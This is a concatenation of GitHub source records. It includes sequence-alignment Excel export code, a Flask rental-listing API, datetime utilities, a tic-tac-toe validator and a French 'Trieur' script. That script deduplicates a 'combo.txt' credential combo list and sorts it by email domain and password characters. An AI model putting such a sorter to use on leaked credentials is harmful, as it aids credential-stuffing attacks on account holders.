sub_seq_to)\n\n elif i in del_dict:\n row += 1\n sheet.cell(row=row, column=1, value=str(row - 1))\n sheet.cell(row=row, column=2, value=final_index)\n sheet.cell(row=row, column=3, value='Del')\n sheet.cell(row=row, column=4, value=str(i))\n end_idx, del_seq = logic.get_del_idx_seq(i + 1, del_dict, del_dict[i])\n sheet.cell(row=row, column=5, value=str(end_idx))\n sheet.cell(row=row, column=6, value=del_seq)\n\n elif i in ins_dict:\n row += 1\n sheet.cell(row=row, column=1, value=str(row - 1))\n sheet.cell(row=row, column=2, value=final_index)\n sheet.cell(row=row, column=3, value='Ins')\n sheet.cell(row=row, column=4, value=str(i))\n if i == last_idx:\n sheet.cell(row=row, column=5, value=str(i))\n else:\n sheet.cell(row=row, column=5, value=str(i + 1))\n sheet.cell(row=row, column=6, value=ins_dict[i])\n if \"result_\" in fn_key:\n workbook.save(filename=path + fn_key[fn_key.index(\"result_\") + len(\"result_\"):].replace(\".txt\",\n \"\") + self.ext_xlsx)\n else:\n workbook.save(filename=path + fn_key[fn_key.index(\"input\") + len(\"input\") + 1:].replace(\".txt\", \"\") + self.ext_xlsx)\n\n\n\n","repo_name":"astroboi-SH-KWON/analyze_EMBOSS_Needle_result","sub_path":"Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":11392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71456621607","text":"from encoder import encoder #include encoder.py\n\n\nenc = encoder(\"192.168.88.252\",\"m0dts\",\"xxxxx\") #setup new encoder instance - IP of encoder,stream name, stream key\n#enc.restartUDP() #UDP is normally enabled by the Pluto but can need re-starting\nenc.set_streaming_source()\nenc.streaming(\"SD\")\nenc.streaming(\"OFF\")\nenc.streaming(\"HD\")\n\nenc.create_osd_image(\"M0DTS\",64)\nenc.upload_osd_image(0,\"image.jpg\") #MainStream\nenc.disable_osd_image(0)\nenc.enable_osd_image(0,15,15,64)\n\n#enc.create_osd_image(\"M0DTS\",48)\n#enc.upload_osd_image(1,\"image.jpg\") #SubStream\n#enc.disable_osd_image(1)\n#enc.enable_osd_image(1,15,15,64)\n","repo_name":"m0dts/HDMI-Encoder-Tools","sub_path":"encoder_test.py","file_name":"encoder_test.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"69800404650","text":"# coding:utf-\nfrom flask import current_app, jsonify, json, g, request, session\n\nfrom ihome import redis_store, constants, db\nfrom ihome.models import Area, User, Facility, House, HouseImage\nfrom ihome.utils.commons import login_required\nfrom ihome.utils.image_storage import storage\nfrom ihome.utils.response_code import RET\nfrom . import api\n\n\n@api.route(\"/areas\")\ndef get_area_info():\n \"\"\"获取城区信息\"\"\"\n # 先从redis中获取缓存数据\n try:\n areas_json = redis_store.get(\"area_info\")\n except Exception as e:\n current_app.logger.error(e)\n areas_json = None\n if areas_json is None:\n # 查询数据库,获取城区信息\n try:\n areas_list = Area.query.all()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"查询城区信息异常\")\n\n areas = []\n for area in areas_list:\n areas.append(area.to_dict())\n\n # 将数据在redis中保存一份\n # 1将数据转换未json\n area_json = json.dumps(areas)\n\n # 2将数据在redis中存储\n try:\n redis_store.setex(\"area_info\", constants.AREA_INFO_REDIS_EXPIRES, area_json)\n except Exception as e:\n current_app.logger.error(e)\n else:\n # 表示redis中有缓存, 直接使用的是缓存数据\n current_app.logger.info(\"hit redis area info\")\n # 从redis中去取的json数据或者从数据库中查询并转为的json数据\n # areas_json = '[{\"aid\":xx, \"aname\":xxx}, {},{}]'\n\n return '{\"errno\": 0, \"errmsg\": \"查询城区信息成功\", \"data\":{\"areas\": %s}}' % areas_json, 200, \\\n {\"Content-Type\": \"application/json\"}\n\n\n@api.route(\"/user/houses\", methods=[\"GET\"])\n@login_required\ndef get_user_houses():\n \"\"\"获取房东发布的房源信息条目\"\"\"\n user_id = g.user_id\n\n try:\n user = User.query.get(user_id)\n houses = user.houses\n\n # houses = House.query.filter_by(user_id=user_id)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"获取数据失败\")\n\n # 将查询到的房屋信息转换为字典存放到列表中\n houses_list = []\n if houses:\n for house in houses:\n houses_list.append(house.to_basic_dict())\n return jsonify(errno=RET.OK, errmsg=\"OK\", data={\"houses\": houses_list})\n\n\n@api.route(\"/houses/info\", methods=[\"POST\"])\n@login_required\ndef sava_house_info():\n \"\"\"保存房屋的基本信息,前段发送过来的json数据\"\"\"\n # 数据参数\n house_data = request.get_json()\n if house_data is None:\n return jsonify(errno=RET.PARAMERR, errmsg=\"参数错误\")\n\n title = house_data.get(\"title\") # 房屋名称的标题\n price = house_data.get(\"price\") # 房屋价钱\n area_id = house_data.get(\"area_id\") # 房屋所属城区的编号\n address = house_data.get(\"address\") # 房屋地址\n room_count = house_data.get(\"room_count\") # 房屋包含的房间数目\n acreage = house_data.get(\"acreage\") # 房屋面积\n unit = house_data.get(\"unit\") # 房间布局(几室几厅)\n capacity = house_data.get(\"capacity\") # 房屋容纳人数\n beds = house_data.get(\"beds\") # 房屋卧床数目\n deposit = house_data.get(\"deposit\") # 押金\n min_days = house_data.get(\"min_days\") # 最小入住天数\n max_days = house_data.get(\"max_days\") # 最大入住天数\n\n # 校验参数\n if not all(\n [title, price, area_id, address, room_count, acreage, unit, capacity, beds, deposit, min_days, max_days]):\n return jsonify(errno=RET.PARAMERR, errmsg=\"参数不完整\")\n\n try:\n price = int(float(price) * 100)\n deposit = int(float(deposit) * 100)\n except Exception as e:\n return jsonify(errno=RET.DBERR, errmsg=\"参数有误\")\n\n # 保存信息\n user_id = g.user_id\n house = House(\n user_id=user_id,\n area_id=area_id,\n title=title,\n price=price,\n address=address,\n room_count=room_count,\n acreage=acreage,\n unit=unit,\n capacity=capacity,\n beds=beds,\n deposit=deposit,\n min_days=min_days,\n max_days=max_days\n )\n # 处理房屋的设施信息\n facility_id_list = house_data.get(\"facility\")\n if facility_id_list:\n # 表示用户勾选了房屋设施\n # 过滤用户传送的不合理的设施id\n # select * from facility where id in (facility_id_list)\n try:\n facility_list = Facility.query.filter(Facility.id.in_(facility_id_list)).all()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"数据库异常\")\n\n # 为房屋添加设施信息\n if facility_list:\n house.facilities = facility_list\n\n try:\n db.session.add(house)\n db.session.commit()\n except Exception as e:\n current_app.logger.error(e)\n db.session.rollback()\n return jsonify(errno=RET.DBERR, errmsg=\"保存数据失败\")\n\n # 返回\n return jsonify(errno=RET.OK, errmsg=\"保存成功\", data={\"house_id\": house.id})\n\n\n@api.route(\"/houses/image\", methods=[\"POST\"])\n@login_required\ndef save_house_image():\n \"\"\"保存房屋的图片\"\"\"\n # 获取参数 房屋的图片、房屋编号\n house_id = request.form.get(\"house_id\")\n image_file = request.files.get(\"house_image\")\n\n # 校验参数\n if not all([house_id, image_file]):\n return jsonify(errno=RET.PARAMERR, errmsg=\"参数不完整\")\n\n # 判断房屋是否存在\n try:\n house = House.query.get(house_id)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"数据库异常\")\n\n if house is None:\n return jsonify(errno=RET.NODATA, errmsg=\"房屋不存在\")\n\n # 上传房屋图片到七牛中\n image_data = image_file.read()\n try:\n file_name = storage(image_data)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.THIRDERR, errmsg=\"保存房屋图片失败\")\n\n # 保存图片信息到数据库中\n house_image = HouseImage(\n house_id=house_id,\n url=file_name\n )\n db.session.add(house_image)\n\n # 处理房屋基本信息中的主图片\n if not house.index_image_url:\n house.index_image_url = file_name\n db.session.add(house)\n\n try:\n db.session.commit()\n except Exception as e:\n current_app.logger.error(e)\n db.session.rollback()\n return jsonify(errno=RET.DBERR, errmsg=\"保存图片信息失败\")\n\n image_url = constants.QINIU_URL_DOMAIN + file_name\n return jsonify(errno=RET.OK, errmsg=\"保存图片成功\", data={\"image_url\": image_url})\n\n\n@api.route(\"/houses/index\", methods=[\"GET\"])\ndef get_houses_index():\n \"\"\"获取主页幻灯片展示的房屋基本信息\"\"\"\n # 从缓存中尝试获取数据\n try:\n ret = redis_store.get(\"home_page_data\")\n except Exception as e:\n current_app.logger.error(e)\n ret = None\n if ret:\n current_app.logger.info(\"hit house index info redis\")\n # 因为redi中保存的是json字符串, 所以直接进行字符串的拼接返回\n return '{\"errno\":0, \"errmsg\":\"OK\",\"data\":%s}' % ret, 200, {\"Content-Type\": \"application/json\"}\n else:\n try:\n # 查询数据库, 返回房屋订单数目最多的五条数据\n houses = House.query.order_by(House.order_count.desc()).limit(constants.HOME_PAGE_MAX_HOUSES)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"查询数据库失败\")\n if not houses:\n return jsonify(errno=RET.NODATA, errmsg=\"查询无数据\")\n\n houses_list = []\n for house in houses:\n # 如果房屋未设置图片, 则跳过\n if not house.index_image_url:\n continue\n houses_list.append(house.to_basic_dict)\n # 将数据转化为json, 并保存在redis缓存中\n json_houses = json.dumps(houses_list)\n try:\n redis_store.setex(\"home_page_data\", constants.HOME_PAGE_DATA_REDIS_EXPIRES, json_houses)\n except Exception as e:\n current_app.logger.error(e)\n return '{\"errno\":0, \"errmsg\":\"ok\", \"data\":%s}' % json_houses, 200, {\"Content-Type\": \"application/json\"}\n\n\n# @api.route(\"/houses/\", methods=[\"GET\"])\n# def get_house_detail(house_id):\n# \"\"\"获取房屋信息\"\"\"\n# # 前段在房屋详情页面展示时, 如果浏览页面的用户不是该房屋的物主,则展示预定按钮, 否则不展示\n# # 所以需要后端返回登录用户的user_id\n# # 尝试获取用户登录的信息,若登录,则返回给前端登录用户的user_id, 否则返回user_id=-1\n# user_id = session.get(\"user_id\", -1)\n#\n# # 校验参数\n# if not house_id:\n# return jsonify(errno=RET.PARAMERR, errmsg=\"参数错误\")\n#\n# # 先从redis宦岑中获取信息\n# try:\n# ret = redis_store.get(\"house_info_%s\" % house_id)\n# except Exception as e:\n# current_app.logger.error(e)\n# ret = None\n# if ret:\n# current_app.logger.info(\"hit house info redis\")\n# return '{\"errno\":\"0\", \"errmsg\":\"OK\", \"data\":{\"user_id\":%s, \"houses\":%s}}'%(user_id, ret), 200, {\"Content-Type\":\"application/json\"}\n#\n# # 查询数据库\n# try:\n# house = House.query.get(house_id)\n# except Exception as e:\n# current_app.logger.error(e)\n# return jsonify(errno=RET.DBERR, errmsg=\"查询数据库失败\")\n# if not house:\n# return jsonify(errno=RET.NODATA, errmsg=\"没有该数据\")\n#\n# #将房屋对象数据转换为字典\n# try:\n# house_data = house.to_full_dict()\n# except Exception as e:\n# current_app.logger.error(e)\n# return jsonify(errno=RET.DATAERR, errmsg=\"数据出错\")\n#\n# # 存入到redis中\n# json_house = json.dumps(house_data)\n# try:\n# redis_store.setex(\"house_info_%s\"%house_id, constants.HOUSE_DETAIL_REDIS_EXPIRES_SESSION, json_house)\n# except Exception as e:\n# current_app.logger.error(e)\n# resp = '{\"errno\":\"0\", \"errmsg\":\"OK\", \"data\":{\"user_id\":%s, \"house\":%s}}' % (user_id, json_house), 200, {\"Content-Type\": \"application/json\"}\n# return resp\n@api.route(\"/houses/\", methods=[\"GET\"])\ndef get_house_detail(house_id):\n \"\"\"获取房屋详情\"\"\"\n # 前端在房屋详情页面展示时,如果浏览页面的用户不是该房屋的房东,则展示预定按钮,否则不展示,\n # 所以需要后端返回登录用户的user_id\n # 尝试获取用户登录的信息,若登录,则返回给前端登录用户的user_id,否则返回user_id=-1\n user_id = session.get(\"user_id\", \"-1\")\n\n # 校验参数\n if not house_id:\n return jsonify(errno=RET.PARAMERR, errmsg=\"参数确实\")\n\n # 先从redis缓存中获取信息\n try:\n ret = redis_store.get(\"house_info_%s\" % house_id)\n except Exception as e:\n current_app.logger.error(e)\n ret = None\n if ret:\n current_app.logger.info(\"hit house info redis\")\n return '{\"errno\":\"0\", \"errmsg\":\"OK\", \"data\":{\"user_id\":%s, \"house\":%s}}' % (user_id, ret), 200, {\n \"Content-Type\": \"application/json\"}\n\n # 查询数据库\n try:\n house = House.query.get(house_id)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"查询数据失败\")\n\n if not house:\n return jsonify(errno=RET.NODATA, errmsg=\"房屋不存在\")\n\n # 将房屋对象数据转换为字典\n try:\n house_data = house.to_full_dict()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DATAERR, errmsg=\"数据出错\")\n\n # 存入到redis中\n json_house = json.dumps(house_data)\n try:\n redis_store.setex(\"house_info_%s\" % house_id, constants.HOUSE_DETAIL_REDIS_EXPIRE_SECOND, json_house)\n except Exception as e:\n current_app.logger.error(e)\n\n resp = '{\"errno\":\"0\", \"errmsg\":\"OK\", \"data\":{\"user_id\":%s, \"house\":%s}}' % (user_id, json_house), 200, {\n \"Content-Type\": \"application/json\"}\n return resp\n","repo_name":"TingFengwj/ihome","sub_path":"ihome/api_1_0/houses.py","file_name":"houses.py","file_ext":"py","file_size_in_byte":12408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33833201901","text":"from Model.modul import *\r\nfrom Model.domaine import *\r\nimport string\r\n\r\n\r\ndef verif(directory):\r\n if os.path.exists(directory):\r\n pass\r\n else:\r\n print(\"Le fichier '{}' est introuvable !\".format(directory))\r\n quit()\r\n\r\n\r\n# fonction qui simplifie les commandes du fichiers domaine dans le dossier model\r\ndef _create_txt(x):\r\n return Domaine.create_txt(x.get_search(), x.get_name(), combo_list)\r\n\r\n\r\ndef _create_txt_not(x):\r\n return Domaine.create_txt_not(x.get_search(), x.get_name(), combo_list)\r\n\r\n\r\ndef _create_txt_mdp(x):\r\n return Domaine.create_txt_mdp(x.get_search(), x.get_name(), combo_list)\r\n\r\n\r\ndef _create_txt_mdp_search(x):\r\n return Domaine.create_txt_mdp_search(x.get_search(), x.get_name(), combo_list)\r\n\r\n\r\n# fonction pour commencé si oui commence le script sinon ne commence pas\r\n# vérifie si la proposition n'est pas différente de 'Non' sinon recomence la fonction\r\ndef start(txt):\r\n global start_sorte\r\n start_sorte = str(input(\"{} (Oui/Non)\".format(txt)))\r\n if start_sorte == \"Oui\":\r\n start_sorte = True\r\n else:\r\n if start_sorte != \"Non\":\r\n print(\"Je ne vous ai pas compris .\")\r\n return start(txt)\r\n else:\r\n start_sorte = False\r\n\r\n\r\n# fonction pour vérifier si l'utilisateur écrit bien entre les deux propositions possibles (Oui/Non)\r\ndef condition(txt):\r\n global start_sorte\r\n add_domains_input = str(input(\"{} (Oui/Non)\".format(txt)))\r\n if add_domains_input == \"Non\":\r\n start_sorte = False\r\n else:\r\n if add_domains_input != \"Oui\":\r\n print(\"Je ne vous ai pas compris .\")\r\n return condition(txt)\r\n start_sorte = True\r\n\r\n\r\n# verifie si les document indispensable au code sont présents sinon ferme le programme\r\nverif(\"Model/domaine.py\")\r\nverif(\"Model/modul.py\")\r\nverif(\"Combo\")\r\nverif(\"Mdp\")\r\n\r\n# verifie si le fichier \"combo.txt\" existe , si oui le lie sinon print(..)\r\nif os.path.exists(\"combo.txt\"):\r\n with open(\"combo.txt\", \"r+\") as file:\r\n combo_list = file.readlines()\r\n file.close()\r\nelse:\r\n print(\"Le fichier 'combo.txt' est introuvable !\")\r\n add_combo(\"Voulez-vous ajouter le fichier 'combo.txt ?\")\r\n\r\n# trier la combo_list de A -> Z\r\ncombo_list.sort()\r\n\r\n# Nombre d'élement dans la combo_list\r\nnum_lines_combo_list = len(combo_list)\r\nprint(\"Tu as mis une combo de\", num_lines_combo_list)\r\n\r\n# execute la fonction de_dupli qui verifie si 2 arguments sont identique et les enleves\r\ncombo_list = del_dupli(combo_list)\r\n\r\n# Nombre d'élement dans la combo_list\r\nnum_lines_combo_dup_list = len(combo_list)\r\nprint(\"On a supprimé\", num_lines_combo_list - num_lines_combo_dup_list, \"duplication !\")\r\n\r\n# fonction pour creer un fichier txt sans duplie\r\n# create_txt_dupli(combo_list)\r\n\r\n# fonction pour commencer a ajouté une nouvelle recherche\r\nstart(\"Voulez-vous ajoutez une nouvelle recherche ?\")\r\n\r\n# tant que 'start_sorte est 'True' se repete\r\nwhile start_sorte:\r\n #\r\n add_domaine_input = input(\"Veuiller entrer la recherche , et le nom ex:(.com: COM)\").split(\" \")\r\n\r\n add_domaine = Domaine(add_domaine_input[0], add_domaine_input[1], combo_list)\r\n\r\n _create_txt(add_domaine)\r\n\r\n condition(\"Voulez-vous ajoutez une nouvelle recherche ?\")\r\n\r\n# fonction pour commencer a ajouté une nouvelle recherche en fonction des mots de passes\r\nstart(\"Voulez-vous ajoutez une nouvelle recherche en fonction du mot de passe ?\")\r\n\r\n# tant que 'start_sorte est 'True' se repete\r\nwhile start_sorte:\r\n add_domaine_input = input(\"Veuiller entrer la recherche , et le nom ex:(pass Pass)\").split(\" \")\r\n\r\n add_domaine = Domaine(add_domaine_input[0], add_domaine_input[1], combo_list)\r\n\r\n _create_txt_mdp_search(add_domaine)\r\n\r\n condition(\"Voulez-vous ajoutez une nouvelle recherche ?\")\r\n\r\n# fonction pour commencer a utilisé les recherches de tries par défault\r\nstart(\"Voulez-vous utilisé les recherches de tries par défault ?\")\r\n\r\n# tant que 'start_sorte est 'True' se repete\r\nwhile start_sorte:\r\n\r\n # Domaine par défault\r\n fr = Domaine(\".fr:\", \"FR\", combo_list)\r\n com = Domaine(\".com:\", \"COM\", combo_list)\r\n net = Domaine(\".net:\", \"NET\", combo_list)\r\n user = Domaine(\"@\", \"user\", combo_list)\r\n\r\n # def pour simplifié create_txt qui vérifie si le txt existe , et d'apres combo_list qui cherche d'apres la\r\n # recherche , et enfin regarde les lignes du txt si oui ou non est remplie et l'affiche\r\n _create_txt(fr)\r\n\r\n _create_txt(com)\r\n\r\n _create_txt(net)\r\n\r\n _create_txt_not(user)\r\n\r\n condition(\"Voulez-vous le reste ?\")\r\n\r\n if start_sorte is True:\r\n # a simplifié\r\n if os.path.exists(divers):\r\n os.remove(divers)\r\n for combo in combo_list:\r\n # for num in range(0 , len(all_search)): = de 0 à 3 a devellopé pour le faire automatique\r\n if fr.get_search() not in combo:\r\n if com.get_search() not in combo:\r\n if net.get_search() not in combo:\r\n if user.get_search() in combo:\r\n with open(divers, \"a+\") as file:\r\n file.write(combo)\r\n file.close()\r\n # fonction qui regarde les lignes du txt si oui ou non est remplie et l'affiche .\r\n exist(divers)\r\n\r\n # Variable 'start_sorte' en 'False'\r\n start_sorte = False\r\n\r\n# fonction pour lancer le triage des mots de passes\r\nstart(\"Voulez-vous utilisé les recherches de tries en fonction des mots de passes par défault ?\")\r\n\r\nupper_punct = (string.ascii_uppercase + string.punctuation)\r\n\r\n# tant que 'start_sorte est 'True' se repete\r\nwhile start_sorte:\r\n upper = Domaine(string.ascii_uppercase, \"uppercase\", combo_list)\r\n punct = Domaine(string.punctuation, \"punctuation\", combo_list)\r\n\r\n _create_txt_mdp(upper)\r\n _create_txt_mdp(punct)\r\n\r\n time.sleep(10)\r\n start_sorte = False\r\n\r\n\r\n","repo_name":"Toxi91/Trieur","sub_path":"Sorter.py","file_name":"Sorter.py","file_ext":"py","file_size_in_byte":5933,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23655172637","text":"\"\"\"all input validations goes here\"\"\"\n\nfrom django.core.exceptions import ValidationError\n\nimport re\n\nfrom tictactoe_project.settings import X_CHAR, O_CHAR, EMPTY_CHAR,\\\n BOARD_LENGTH\n\nDEFAULT_BOARD_VALUE = EMPTY_CHAR * BOARD_LENGTH\n\n\ndef validate_board_chars(value):\n \"\"\"\n make sure board length is BOARD_LENGTH and contains only\n chars in [X_CHAR, O_CHAR, EMPTY_CHAR]\n \"\"\"\n\n reg_to_match = fr'[{X_CHAR},{O_CHAR},{EMPTY_CHAR}]{ {BOARD_LENGTH} }$'\n reg = re.compile(reg_to_match)\n is_match = reg.match(value)\n if not is_match:\n error_msg = f\"board must be of length {BOARD_LENGTH} and accepts only charecters in{[X_CHAR, O_CHAR, EMPTY_CHAR]}\"\n raise ValidationError(error_msg)\n return value\n\n\ndef validate_new_move(old_board, new_board, current_player):\n \"\"\"check if player played his correct role and made only one move\"\"\"\n moves_count = 0\n for x in range(BOARD_LENGTH):\n if old_board[x] == new_board[x]:\n # if both board cells are equal then\n # we dont need to check any thing, no changes there\n continue\n is_assigning_to_already_selected = old_board[x] != EMPTY_CHAR\n if is_assigning_to_already_selected:\n raise ValidationError(\n f\"cannot change cell number {x+1}, it has been already selected!\")\n played_other_role = new_board[x] != current_player\n if played_other_role:\n raise ValidationError(f\"You must play using {current_player} sign\")\n moves_count += 1\n if moves_count > 1:\n raise ValidationError(\"You can play only one move!\")\n","repo_name":"hocinekhen/tictactoe","sub_path":"tictactoe-backend/tictactoe_app/helpers/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30724282859","text":"from datetime import datetime, date, timedelta, timezone\nimport dateparser\nfrom typing import Union, Tuple, Optional\n\nimport discord\n\nfrom kaztron.config import get_kaztron_config\n\n\nDATEPARSER_SETTINGS = {\n 'TIMEZONE': 'UTC',\n 'TO_TIMEZONE': 'UTC',\n 'RETURN_AS_TIMEZONE_AWARE': False\n}\n\n\ndef parse(timespec: str, future=False, **kwargs) -> Optional[datetime]:\n \"\"\"\n Datetime parser, using the `dateparse` package. By default, assumes the UTC timezone unless the\n datetime string specifies timezone.\n\n :param timespec: String to parse\n :param future: If True, ambiguous dates should favour future times. Otherwise, past.\n :param kwargs: Any other kwargs to pass to dateparser.parse\n :return: A timezone-agnostic datetime object in UTC.\n \"\"\"\n settings = DATEPARSER_SETTINGS.copy()\n settings.update(kwargs)\n if not future:\n return dateparser.parse(timespec, settings=settings)\n else:\n # workaround for https://github.com/scrapinghub/dateparser/issues/403\n # we'll try it out without this setting and return if it's in the future\n dt = dateparser.parse(timespec, settings=settings)\n if dt is None: # not parsable\n return dt\n elif dt > datetime.utcnow():\n return dt\n else:\n settings['PREFER_DATES_FROM'] = 'future'\n return dateparser.parse(timespec, settings=settings)\n\n\ndef utctimestamp(utcdt: datetime):\n return utcdt.replace(tzinfo=timezone.utc).timestamp()\n \n\ndef truncate(dt: datetime, timespec='minute'):\n \"\"\"\n Truncate a datetime to the resolution given by 'timespec'.\n\n :param dt: The datetime to round.\n :param timespec: One of \"month\", \"day\", \"hour\", \"minute\", \"second\" - the level of resolution\n to round to.\n :raise ValueError: invalid timespec parameter\n \"\"\"\n if timespec == 'month':\n dt_replace_params = {'day': 1, 'hour': 0, 'minute': 0, 'second': 0, 'microsecond': 0}\n elif timespec == 'day':\n dt_replace_params = {'hour': 0, 'minute': 0, 'second': 0, 'microsecond': 0}\n elif timespec == 'hour':\n dt_replace_params = {'minute': 0, 'second': 0, 'microsecond': 0}\n elif timespec == 'minute':\n dt_replace_params = {'second': 0, 'microsecond': 0}\n elif timespec == 'second':\n dt_replace_params = {'microsecond': 0}\n else:\n raise ValueError(\"invalid timespec {!r}\".format(timespec))\n\n try:\n return dt.replace(**dt_replace_params)\n except AttributeError as e:\n raise ValueError(\"invalid dt parameter {!r}\".format(dt)) from e\n\n\ndef format_datetime(dt: datetime, seconds=False) -> str:\n \"\"\"\n Format a datetime object as a datetime (as specified in config).\n :param dt: The datetime object to format.\n :param seconds: Whether or not to display seconds (this determines which config format to use).\n :return:\n \"\"\"\n format_key = 'datetime_format' if not seconds else 'datetime_seconds_format'\n return dt.strftime(get_kaztron_config().get('core', format_key))\n\n\ndef format_date(d: Union[datetime, date]) -> str:\n \"\"\"\n Format a datetime object as a date (as specified in config).\n\n :param d: The date or datetime object to format.\n :return:\n \"\"\"\n return d.strftime(get_kaztron_config().get('core', 'date_format'))\n\n\ndef format_timedelta(delta: timedelta, timespec=\"seconds\") -> str:\n \"\"\"\n Format a timedelta object into \"x days y hours\" etc. format.\n\n This is ugly. Sorry.\n\n :param delta: The delta to format.\n :param timespec: One of \"days\", \"hours\", \"minutes\", \"seconds\", \"microseconds\" - the level of\n resolution to show.\n :return:\n \"\"\"\n str_parts = []\n\n timespec_list = ['days', 'hours', 'minutes', 'seconds', 'microseconds']\n try:\n timespec_prio = timespec_list.index(timespec)\n\n # get a resolution object to round against\n if timespec == 'days':\n res = timedelta(days=1)\n elif timespec == 'hours':\n res = timedelta(hours=1)\n elif timespec == 'minutes':\n res = timedelta(minutes=1)\n elif timespec == 'seconds':\n res = timedelta(seconds=1)\n elif timespec == 'microseconds':\n res = None\n except ValueError:\n raise ValueError(\"Invalid timespec {!r}\".format(timespec)) from None\n\n # round\n if res:\n delta = (delta + res/2) // res * res\n\n # split up seconds into hours, minutes, seconds\n # (because timedelta only stores days and seconds???)\n rem = timedelta(seconds=delta.seconds, microseconds=delta.microseconds)\n # noinspection PyTypeChecker\n hours, rem = divmod(rem, timedelta(hours=1))\n # noinspection PyTypeChecker\n minutes, rem = divmod(rem, timedelta(minutes=1))\n # noinspection PyTypeChecker\n seconds, rem = divmod(rem, timedelta(seconds=1))\n\n if delta.days:\n str_parts.append(\"{:d} day{}\".format(delta.days, 's' if abs(delta.days) != 1 else ''))\n if hours and timespec_prio >= timespec_list.index('hours'):\n str_parts.append(\"{:d} hour{}\".format(hours, 's' if abs(hours) != 1 else ''))\n if minutes and timespec_prio >= timespec_list.index('minutes'):\n str_parts.append(\"{:d} minute{}\".format(minutes, 's' if abs(minutes) != 1 else ''))\n if (seconds or delta.microseconds) and timespec_prio >= timespec_list.index('microseconds'):\n f_seconds = seconds + delta.microseconds/1e6\n str_parts.append(\"{:.6f} second{}\".format(f_seconds, 's' if f_seconds != 1.0 else ''))\n elif seconds and timespec_prio >= timespec_list.index('seconds'):\n str_parts.append(\"{:d} second{}\".format(seconds, 's' if seconds != 1 else ''))\n\n if not str_parts:\n if timespec == 'microseconds':\n timespec = 'seconds'\n str_parts.append(\"0 {}\".format(timespec))\n\n return ' '.join(str_parts)\n\n\ndef format_timestamp(dt: Union[discord.Message, datetime]) -> str:\n \"\"\" Get the timestamp string of a message to second precision, with 'UTC' timezone string. \"\"\"\n if isinstance(dt, discord.Message):\n dt = dt.timestamp\n return format_datetime(dt, seconds=True) + ' UTC'\n\n\ndef get_month_offset(dt_month: datetime, months: int) -> datetime:\n \"\"\"\n Add or subtract months from a month datetime. Always returns the 1st of the month at midnight.\n :param dt_month:\n :param months: Number of months to add (>0) or subtract (<0).\n :return:\n \"\"\"\n offset = abs(months)\n if months > 0:\n delta = timedelta(days=32)\n else:\n delta = timedelta(days=-1)\n\n new_dt = truncate(dt_month, 'month')\n for _ in range(offset):\n new_dt = truncate(new_dt + delta, 'month')\n return new_dt\n\n\ndef get_weekday(dt: datetime, weekday: int, future=True) -> datetime:\n \"\"\"\n Get the nearest date corresponding to a weekday before or after the reference date. The time\n of ``dt`` is NOT considered when calculating past/future, only the date.\n\n The returned datetime will have the same time-of-day as ``dt``.\n :param dt: The reference date.\n :param weekday: The weekday to find (0 = Sunday, 6 = Saturday).\n :param future: If True, find the nearest date in the future (including today). Otherwise, find\n the nearest date in the past.\n \"\"\"\n if not 0 <= weekday < 7:\n raise ValueError(\"0 <= weekday < 7, got {}\".format(weekday))\n\n dt_future = dt + timedelta(days=(weekday - dt.weekday() + 7) % 7)\n\n if future:\n return dt_future\n else:\n return dt_future - timedelta(days=7)\n\n\ndef parse_daterange(daterange: str, future=False) -> Tuple[datetime, datetime]:\n \"\"\"\n Process and parse a date or daterange, in the form of \"X to Y\".\n \"\"\"\n date_split = daterange.split(' to ', maxsplit=1)\n\n dates = tuple(parse(date_str, future=future) for date_str in date_split)\n if None in dates:\n raise ValueError(\"Invalid date format(s): {!r} processed as {!r}\".format(daterange, dates))\n\n # if only one\n if len(dates) == 1:\n dates = (dates[0], dates[0] + timedelta(days=1))\n\n # if the order is wrong, swap\n if dates[0] > dates[1]:\n dates = (dates[1], dates[0])\n\n return dates\n","repo_name":"Worldbuilding/kaztron","sub_path":"kaztron/utils/datetime.py","file_name":"datetime.py","file_ext":"py","file_size_in_byte":8144,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"19175636732","text":"import tempfile\nimport shutil\nimport os\nfrom lbry.testcase import AsyncioTestCase\nfrom lbry.conf import Config\nfrom lbry.extras.daemon.storage import SQLiteStorage\nfrom lbry.blob.blob_manager import BlobManager\n\n\nclass TestBlobManager(AsyncioTestCase):\n async def setup_blob_manager(self, save_blobs=True):\n tmp_dir = tempfile.mkdtemp()\n self.addCleanup(lambda: shutil.rmtree(tmp_dir))\n self.config = Config(save_blobs=save_blobs)\n self.storage = SQLiteStorage(self.config, os.path.join(tmp_dir, \"lbrynet.sqlite\"))\n self.blob_manager = BlobManager(self.loop, tmp_dir, self.storage, self.config)\n await self.storage.open()\n\n async def test_memory_blobs_arent_verified_but_real_ones_are(self):\n for save_blobs in (False, True):\n await self.setup_blob_manager(save_blobs=save_blobs)\n # add a blob file\n blob_hash = \"7f5ab2def99f0ddd008da71db3a3772135f4002b19b7605840ed1034c8955431bd7079549e65e6b2a3b9c17c773073ed\"\n blob_bytes = b'1' * ((2 * 2 ** 20) - 1)\n blob = self.blob_manager.get_blob(blob_hash, len(blob_bytes))\n blob.save_verified_blob(blob_bytes)\n await blob.verified.wait()\n self.assertTrue(blob.get_is_verified())\n self.blob_manager.blob_completed(blob)\n 